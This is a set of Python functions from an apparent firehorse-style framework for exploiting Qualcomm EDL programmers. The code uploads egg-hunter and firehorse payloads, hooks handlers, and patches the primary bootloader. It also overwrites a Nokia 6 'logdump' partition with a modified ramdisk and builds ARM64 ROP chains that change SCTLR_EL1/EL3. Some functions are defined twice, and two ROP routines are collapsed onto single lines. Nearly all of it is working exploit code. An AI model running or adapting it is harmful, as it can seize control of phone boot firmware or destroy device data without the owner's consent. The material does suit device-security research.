def upload_fh():
    """Send the 64-bit firehorse payload to the programmer base address.

    The payload path is relative to the current working directory, so this
    only works when run from the expected build layout. The transfer goes
    through ``FH_FW.sendfile``; nothing is returned.
    """
    target = t.get()
    payload_path = "../device/build/fh64.payload"
    FH_FW.sendfile(payload_path, target.fh_base_programmer)
def hook_handlers():
    """Write dbgentry64.payload into 16 consecutive 0x80-byte slots.

    Unlike the sibling entry points, the base address here is a hard-coded
    literal (0xf803f000) rather than a ``target`` attribute, so it is tied to
    one firmware layout. Each slot index is logged through ``I`` before the
    transfer.
    """
    target = t.get()  # resolved for parity with the other entry points; not used below
    I("Hooking handlers")
    slot_base = 0xf803f000
    slot_size = 0x80
    payload_path = "../device/build/dbgentry64.payload"
    for slot in xrange(16):
        I("%d" % slot)
        FH_FW.sendfile(payload_path, slot_base + slot * slot_size)
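def do_send(self, dst, part):
    """Prepend the escaped little-endian destination to *part* and poke it via FH_FW.

    The destination is packed as an unsigned 32-bit little-endian word and the
    bytes NUL, double quote and 0x1a are each substituted by the matching
    4-byte XMLHunter magic marker (presumably bytes the transport cannot carry
    verbatim -- confirm against the hunter payload). Substitutions are applied
    in the original order, so a marker produced by an earlier step is itself
    subject to later steps.

    Args:
        dst: destination address; must fit in 32 bits.
        part: payload bytes placed after the encoded destination.
    """
    # Ordered (raw byte -> marker) table; order matters, see docstring.
    escapes = (
        ("\x00", struct.pack("<L", XMLHunter.MAGIC_NULL)),
        ("\"", struct.pack("<L", XMLHunter.MAGIC_QUOTE)),
        ("\x1a", struct.pack("<L", XMLHunter.MAGIC_ONEAH)),
    )
    header = struct.pack("<L", dst)
    for raw_byte, marker in escapes:
        header = header.replace(raw_byte, marker)
    # arch presumably is a bit width; poke_payload wants bytes. `//` keeps this an
    # int on Python 3 as well (the original `/` would yield a float there).
    width_bytes = self.target.arch // 8
    FH_FW.poke_payload(self.target.exe_addr, width_bytes,
                       self.target.egghunter_base, header + part)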
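def magic():
    """Build patches/breakpoints, upload firehorse and run the PBL patcher.

    Side effects: writes the packed firehorse blob to ../tmp/fh.bin, sends two
    XMLHunter uploads (data to the scratch area, then fh.payload to the
    programmer base) and issues INIT and PBL_PATCHER commands via FH_FW.
    Another function named ``magic`` appears on this page; if both live in one
    module the later definition shadows this one.
    """
    target = t.get()
    cmd = Commands()
    bbdb = BasicBlocks(target.basicblocks_db_pbl)
    bpm = BreakpointManager(bbdb)
    pm = PatchManager()

    I('applying patches and breakpoints...')
    apply_patches(pm, target)
    apply_breakpoints(bpm)

    I('creating pagecopy...')
    # Union of every PBL page touched by either a patch or a breakpoint.
    pages = set()
    pages.update(pm.get_pbl_page_numbers())
    pages.update(bpm.get_pbl_page_numbers())
    I('pages: ' + str(pages))
    # Device-specific page list; its origin is not visible in this file.
    copy_target_pages = [
        0x807D000, 0x807E000, 0x807F000, 0x807C000,
        0x8068000, 0x806e000, 0x807B000,
    ]
    pc = PageCopy(MODE_PBL, target.pbl_base_addr, target.pbl_copy_addr, pages,
                  target_pages=copy_target_pages)

    I('uploading firehorse data...')
    fh = Firehorse(pm, bpm, pc)
    fhdata = fh.pack()
    # Managed handle: the original closed the file only on the happy path.
    with open("../tmp/fh.bin", "wb") as fhbin:
        fhbin.write(fhdata)
    e = XMLHunter(fhdata, target.fh_base_programmer + target.fh_scratch_offset, target)
    e.send()

    I('uploading firehorse..')
    # file(...).read() left the descriptor open until garbage collection.
    with open("../device/build/fh.payload", "rb") as payload_file:
        fh_payload = payload_file.read()
    e = XMLHunter(fh_payload, target.fh_base_programmer, target)
    e.send()

    I('initializing firehorse...')
    FH_FW.exe_cmd(target.fh_base_programmer, cmd.INIT)
    I('calling pbl patcher...')
    FH_FW.exe_cmd(target.fh_base_programmer, cmd.PBL_PATCHER)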
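def magic():
    """Patch the PBL via firehorse, then transfer execution to the PBL base.

    Destructive: the first device operation overwrites the "logdump" partition
    with the modified ramdisk image. It then writes ../tmp/fh.bin locally,
    uploads the firehorse data and payload with ``Egg``, issues INIT and
    PBL_PATCHER, optionally pauses (any argv entry containing "wait"), sleeps
    five seconds and calls ``Framework.exe``. Another ``magic`` appears on this
    page; if both live in one module the later definition wins.
    """
    cmd = Commands()
    target = t.get()
    # overwrite logdump partition with our modified ramdisk
    Framework.write_partition("logdump", "target/nokia6/nokia6-ramdisk-modified.cpio.gz")

    bbdb = BasicBlocks(target.basicblocks_db_pbl)
    bpm = BreakpointManager(bbdb)
    pm = PatchManager()
    I("applying patches and breakpoints...")
    apply_patches(pm, target)
    apply_breakpoints(bpm)

    I("creating pagecopy...")
    # Union of every PBL page touched by either a patch or a breakpoint.
    pages = set()
    pages.update(pm.get_pbl_page_numbers())
    pages.update(bpm.get_pbl_page_numbers())
    I("pages: " + str(pages))
    pc = PageCopy(MODE_PBL, target.pbl_base_addr, target.pbl_copy_addr, pages)

    I("uploading firehorse data...")
    fh = Firehorse(pm, bpm, pc)
    fhdata = fh.pack()
    # Managed handle: the original closed the file only on the happy path.
    with open("../tmp/fh.bin", "wb") as fhbin:
        fhbin.write(fhdata)
    egg_hunter = Egg(fhdata, target.fh_base_programmer + target.fh_scratch_offset)
    egg_hunter.send()

    I("uploading firehorse...")
    # file(...).read() left the descriptor open until garbage collection.
    with open("../device/build/fh.payload", "rb") as payload_file:
        fh_payload = payload_file.read()
    egg_hunter = Egg(fh_payload, target.fh_base_programmer)
    egg_hunter.send()

    I("initializing firehorse...")
    FH_FW.exe_cmd(target.fh_base_programmer, cmd.INIT)
    I("calling pbl patcher...")
    FH_FW.exe_cmd(target.fh_base_programmer, cmd.PBL_PATCHER)

    # Substring match over the joined argv: any argument containing "wait"
    # (e.g. "--nowait") also triggers the pause. Kept for compatibility.
    if "wait" in " ".join(sys.argv):
        I("waiting for LF")
        raw_input()
    I("you have 5 seconds")
    time.sleep(5)
    Framework.exe(target.pbl_base_addr)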
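def _send_parts(self, d):
    """Reset the found-parts counter, run the egg hunter, and return the new counter.

    Writes ``self.pack(d)`` to ``Egg.EGG_FILE``, sends the egg XML through
    ``FH_FW.firehose``, executes the hunter at ``egghunter_base`` and reads
    back ``egghunter_found_parts``.

    Args:
        d: data handed to ``self.pack``; its expected type is not visible here.

    Returns:
        The 32-bit value read from ``self.target.egghunter_found_parts``.
    """
    FH_FW.poke32(self.target.egghunter_found_parts, 0)
    # Managed handles: the original relied on CPython refcounting to close
    # (and flush) the egg file before the XML was sent.
    with open(Egg.EGG_FILE, "wb") as egg_file:
        egg_file.write(self.pack(d))
    with open(self.target.egg_xml, "rb") as xml_file:
        xml = xml_file.read()
    FH_FW.firehose(xml)
    FH_FW.exe_cmd(self.target.egghunter_base, 0)
    # Single read; the original read the counter twice and discarded the first value.
    return FH_FW.peek32(self.target.egghunter_found_parts)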
def boom():
    """Probe sequence: read 0x1100 bytes from the programmer base four times.

    A counter is logged after each read, followed by '5' and 'boom'. No value
    is returned; the reads are only issued for their effect on the device.
    """
    target = t.get()
    base = target.fh_base_programmer
    for step in ('1', '2', '3', '4'):
        FH_FW.peek(base, 0x1100)
        I(step)
    I('5')
    I('boom')
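def upload_fh_data():
    """Pack an empty patch/breakpoint set into firehorse data and send it to the scratch area.

    Despite the log line, no patches or breakpoints are applied and no pages
    are collected, so the PageCopy only carries the hard-coded
    ``target_pages`` list. The packed blob is written to ../tmp/fh.bin and that
    file is what ``FH_FW.sendfile`` transfers.
    """
    target = t.get()
    bbdb = BasicBlocks(target.basicblocks_db_pbl)
    bpm = BreakpointManager(bbdb)
    pm = PatchManager()
    I('applying patches and breakpoints...')  # nothing is applied here
    I('creating pagecopy...')
    pages = set()
    I('pages: ' + str(pages))
    # Device-specific page list; its origin is not visible in this file.
    copy_target_pages = [
        0x807D000, 0x807E000, 0x807F000, 0x807C000,
        0x8068000, 0x806e000, 0x807B000,
    ]
    pc = PageCopy(MODE_PBL, target.pbl_base_addr, target.pbl_copy_addr, pages,
                  target_pages=copy_target_pages)
    I('uploading firehorse data...')
    fhdata = Firehorse(pm, bpm, pc).pack()
    # One path for both the write and the send, and the handle is closed even if
    # write() raises (the original closed it only on the happy path).
    fhbin_path = "../tmp/fh.bin"
    with open(fhbin_path, "wb") as fhbin:
        fhbin.write(fhdata)
    FH_FW.sendfile(fhbin_path, target.fh_base_programmer + target.fh_scratch_offset)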
def voodoo():
    """Read 0x4000 bytes from the programmer base eight times, printing each iteration index."""
    target = t.get()
    base = target.fh_base_programmer
    for index in xrange(8):
        print('%d' % index)
        FH_FW.peek(base, 0x4000)
def upload_init64():
    """Send init64.payload to the programmer base and call ``FH_FW.exe64`` on that address."""
    target = t.get()
    dest = target.fh_base_programmer
    FH_FW.sendfile("../device/build/init64.payload", dest)
    FH_FW.exe64(dest)
def rop(): target = t.get() # copy original stack FH_FW.copy(0xFEC040a0, 0xFEC03F90, 0x256) FH_FW.copy(0xFEC04098, 0xFEC03F88, 8) # gadget_set_sctlr_el3 FH_FW.poke64(0xFEC04060, 0xF803DF38) # saved x1 = 0 FH_FW.poke64(0xFEC04f88, 0) # gadget_blr_x4 FH_FW.poke64(0xFEC03f90, 0xf800e280) # super gadget F803E848 FH_FW.poke64(target.saved_lr_addr, 0xF803E848)
def init_firehose():
    """Issue the INIT command to the programmer base through ``FH_FW.exe64_cmd``."""
    target = t.get()
    commands = Commands()
    I('initializing firehorse...')
    FH_FW.exe64_cmd(target.fh_base_programmer, commands.INIT)
def upload_xmlhunter(self):
    """Send xmlhunt.payload to ``self.target.egghunter_base`` and set the class-wide uploaded flag."""
    dest = self.target.egghunter_base
    I('uploading xmlhunter to %08x' % dest)
    FH_FW.sendfile("../device/build/xmlhunt.payload", dest)
    # Class attribute, not instance attribute: every XMLHunter sees it once set.
    XMLHunter.uploaded = True
def upload_egghunter(self):
    """Send dload.payload to ``self.target.egghunter_base`` and set the class-wide uploaded flag."""
    dest = self.target.egghunter_base
    I('uploading egghunter to %08x' % dest)
    FH_FW.sendfile("../device/build/dload.payload", dest)
    # Class attribute, not instance attribute: every Egg sees it once set.
    Egg.uploaded = True
def rop(): target = t.get() # super gadget # FH_FW.poke64(target.saved_lr_addr+8, GADGET_INFINITE_LOOP) """ # copy original stack FH_FW.copy(target.saved_lr_addr+0x128, target.saved_lr_addr+8, 0x128) # copy original saved lr FH_FW.poke64(target.saved_lr_addr+0x120, target.saved_lr) # set new stack FH_FW.poke64(target.saved_lr_addr+0x20, target.saved_lr_addr+0x118) # set blr x8 gadget FH_FW.poke64(target.saved_lr_addr+0x8, GADGET_RESET) # set saved_x8 FH_FW.poke64(target.saved_lr_addr+0xb8, GADGET_RESET) # set super gadget FH_FW.poke64(target.saved_lr_addr, GADGET_SUPER) """ # FH_FW.poke64(target.saved_lr_addr+0xC0, 0) # FH_FW.poke64(target.saved_lr_addr+0x30, GADGET_RESET) # FH_FW.poke64(target.saved_lr_addr+0x28, GADGET_RESET) # FH_FW.poke64(target.saved_lr_addr+0x20, GADGET_RESET) # FH_FW.poke64(target.saved_lr_addr+0x18, GADGET_RESET) # FH_FW.poke64(target.saved_lr_addr+0x10, GADGET_RESET) # FH_FW.poke64(target.saved_lr_addr+0x8, GADGET_RESET) FH_FW.poke64(target.saved_lr_addr + 0x1f0, 0x0) # x1 FH_FW.poke64(target.saved_lr_addr + 0x108, 0x98) # x28 FH_FW.poke64(target.saved_lr_addr + 0x128, 0x1) # x24 FH_FW.poke64(target.saved_lr_addr + 0x130, 0x1000) # X25 FH_FW.poke64(target.saved_lr_addr + 0x160, target.saved_lr_addr + 0x218 + 0x28) FH_FW.poke64(target.saved_lr_addr + 0x200, target.saved_lr_addr + 0x218 + 0x28) FH_FW.copy_and_rebase(target.saved_lr_addr + 0x218, target.saved_lr_addr + 8, 0x210) FH_FW.poke64(target.saved_lr_addr + 0x210, target.saved_lr) FH_FW.poke64(target.saved_lr_addr + 0x110, target.saved_lr_addr + 0x208) FH_FW.poke64(target.saved_lr_addr + 0x1a8, GADGET_SCTLR_EL1) FH_FW.poke64(target.saved_lr_addr + 0xf8, GADGET_BLR_X8) FH_FW.poke64(target.saved_lr_addr + 0xf0, GADGET_SUPER) FH_FW.poke64(target.saved_lr_addr, GADGET_ADD_SP)